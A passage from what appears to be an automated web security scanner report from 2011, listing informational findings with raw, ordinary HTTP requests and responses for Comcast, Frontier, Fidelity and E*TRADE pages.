Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:06 GMT
Server: Apache
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 24371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Today's Top 10 Bullish Stocks | E*TRADE Securities</title>
   
...[SNIP]...

23.12. https://www.comcast.com/Localization/QueryCompletion.cajax  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/QueryCompletion.cajax

Request

POST /Localization/QueryCompletion.cajax HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: https://www.comcast.com/Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP
Content-Length: 39
Origin: https://www.comcast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}

{"Method":"GetKeywords","Arg":"\"xs\""}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 12:22:11 GMT
Connection: close

"{\"_keyword\":\"xs\",\"_result\":[]}"

23.13. https://www.comcastsupport.com/ChatEntry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/

Request

GET /ChatEntry/ HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI; ASPSESSIONIDQASCSTCT=PNCAEBNCKLLFGDNPGFOIEALJ

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<sc
...[SNIP]...

23.14. https://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Content/Images/favicon.ico

Request

GET /ChatEntry/Content/Images/favicon.ico HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI; ASPSESSIONIDQASCSTCT=PNCAEBNCKLLFGDNPGFOIEALJ; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331945055%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:c8e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:29:08 GMT

............ .h.......(....... ..... .............................11..................................................94......77..........................................;6...........
..<5..        ........
...[SNIP]...

23.15. https://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Content/Images/mainbg.jpg

Request

GET /ChatEntry/Content/Images/mainbg.jpg HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1447
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg
Last-Modified: Tue, 19 Jul 2011 15:03:30 GMT
Accept-Ranges: bytes
ETag: "08d1652546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:43 GMT

......Exif..II*.................Ducky.......<.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

23.16. https://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Content/Images/start_chat.png

Request

GET /ChatEntry/Content/Images/start_chat.png HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 3467
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:43 GMT

.PNG
.
...IHDR.......#.....m.......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

23.17. https://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Content/images/menubg.jpg

Request

GET /ChatEntry/Content/images/menubg.jpg HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1155
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg
Last-Modified: Tue, 19 Jul 2011 15:03:30 GMT
Accept-Ranges: bytes
ETag: "08d1652546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:43 GMT

......Exif..II*.................Ducky.......<.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

23.18. https://www.comcastsupport.com/ChatEntry/Forms/Suggestions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Forms/Suggestions.aspx

Request

GET /ChatEntry/Forms/Suggestions.aspx?searchValue=How+can+I+make+a+payment HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/ChatEntry/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI; ASPSESSIONIDQASCSTCT=PNCAEBNCKLLFGDNPGFOIEALJ; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331945055%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5476


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Before chatting, there may be a quick fix. Here are some suggestions...</title>
</head>
<body>
<form name="SuggestionsForm"
...[SNIP]...

23.19. https://www.comcastsupport.com/ChatEntry/Forms/UserForm.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Forms/UserForm.aspx

Request

GET /ChatEntry/Forms/UserForm.aspx?subject=ACCOUNT+%26+BILL&surveySelect=Technical&queue=UIDpassword HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>

...[SNIP]...

23.20. https://www.comcastsupport.com/ChatEntry/eHelpProxy.asmx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/eHelpProxy.asmx

Request

POST /ChatEntry/eHelpProxy.asmx HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
Content-Length: 349
Origin: https://www.comcastsupport.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml; charset="UTF-8"
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/enve
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1574

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLS
...[SNIP]...

23.21. https://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/img/xfinity/gradient.png

Request

GET /ChatEntry/img/xfinity/gradient.png HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI

Response

HTTP/1.1 200 OK
Content-Length: 5060
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:29:01 GMT

.PNG
.
...IHDR..............i.r....tEXtSoftware.Adobe ImageReadyq.e<...yPLTE.........................................................,,,...===............888.........777555......666..."""###%%%)))99
...[SNIP]...

23.22. https://www.comcastsupport.com/chatentry/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /chatentry/Default.aspx

Request

GET /chatentry/Default.aspx HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<sc
...[SNIP]...

23.23. https://www.fidelity.com/welcome/200-free-trades  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fidelity.com
Path:   /welcome/200-free-trades

Request

GET /welcome/200-free-trades HTTP/1.1
Host: www.fidelity.com
Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC=90Vi^mj6PDU08DaQWofS_WBSF08SAk5mFqEKAyjtIAApBQACqjMGBAAAAQAGBU5mFqEAP03

Response

HTTP/1.1 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Length: 27674
Content-Type: text/html;charset=ISO-8859-1
Fsreqid: REQ4e6616b80a0328ee200040e30004aa33
Fscalleeid: fidweb321
Fselapsedtime: 64690
Date: Tue, 06 Sep 2011 12:48:56 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0857CAA8FA2A66D639C8268989A40DB3; path=/


...[SNIP]...

23.24. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: text/css
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:27:19 GMT

<STYLE TYPE="text/css">
   h1,p{
       margin:0px !important;
   }
   .tableft{
       background-image:url(../Images/tableft.gif);
   }
   .tabright{
       background-image:url(../Images/tabright.gif);
   }
   #tabm
...[SNIP]...

23.25. https://www.frontier.com/AgentOrdering/Login/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Request

GET /AgentOrdering/Login/ HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

23.26. https://www.frontier.com/AgentOrdering/Login/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Request

POST /AgentOrdering/Login/Default.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Content-Length: 15546
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

23.27. https://www.frontier.com/BillPay/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Request

GET /BillPay/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

23.28. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Request

POST /Controls/SharedWebMethods.aspx/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Content-Length: 12
Origin: https://www.frontier.com
X-Requested-With: XMLHttpRequest
